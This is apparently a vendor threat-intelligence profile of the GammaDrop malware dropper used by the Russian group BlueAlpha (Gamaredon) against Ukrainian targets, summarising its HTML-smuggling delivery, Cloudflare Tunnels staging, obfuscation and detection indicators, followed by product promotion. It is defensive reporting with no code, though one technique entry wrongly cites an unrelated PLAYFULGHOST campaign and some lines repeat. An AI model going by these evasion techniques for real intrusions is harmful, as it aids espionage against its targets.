GammaDrop
GammaDrop is a malware dropper associated with the Russian FSB-directed threat group BlueAlpha, which overlaps with Gamaredon, Shuckworm, Hive0051, and UNC530 and has targeted Ukrainian organizations since at least 2014. Reporting states that BlueAlpha has used GammaDrop in spearphishing-driven delivery chains, including HTML smuggling with embedded JavaScript and modified deobfuscation methods such as use of the onerror HTML event. BlueAlpha has also used Cloudflare Tunnels, specifically randomly generated TryCloudflare subdomains, to conceal GammaDrop staging infrastructure and evade traditional network detection. GammaDrop’s documented role is to write the VBScript malware GammaLoad to disk and establish persistence on the victim system. GammaLoad is described as a custom loader used since at least October 2023 for data exfiltration, credential theft, persistent access, command-and-control beaconing, and execution of additional malware. The reporting also notes BlueAlpha’s use of obfuscation techniques including junk code and random variable names, as well as DNS fast-fluxing to complicate tracking and disruption of command-and-control infrastructure. High-confidence detection-relevant details mentioned in the content include delivery via HTML attachments used for HTML smuggling, suspicious use of mshta.exe, untrusted .lnk files, requests to trycloudflare.com subdomains, and unauthorized DNS-over-HTTPS activity.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
GammaDrop: acts as a dropper, writing GammaLoad to disk and ensuring persistence
GammaDrop: acts as a dropper, writing GammaLoad to disk and ensuring persistence
GammaDrop: acts as a dropper, writing GammaLoad to disk and ensuring persistence
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques"PLAYFULGHOST Delivered via Phishing and SEO Poisoning"; "Victims get infected via phishing emails"; "phishing campaign" (multiple entries)
BlueAlpha has been active since at least 2014 and continues to target Ukrainian organizations through relentless spearphishing campaigns to distribute custom malware.
Stealth
2 techniquesBlueAlpha uses obfuscation techniques, namely extensive amounts of junk code and random variable names to complicate analysis.
The group delivers malware through HTML smuggling, leveraging sophisticated techniques to bypass email security systems.
Command and Control
2 techniquesBlueAlpha uses Cloudflare Tunnels to conceal its GammaDrop staging infrastructure, evading traditional network detection mechanisms.
GammaDrop: acts as a dropper, writing GammaLoad to disk and ensuring persistence
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware used by Gamaredon in spear-phishing campaigns; infrastructure concealed using Cloudflare Tunnels and DNS fast-flux.
Malware dropper in BlueAlpha's malware suite that is staged via Cloudflare Tunnels and used to write GammaLoad to disk and establish persistence.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.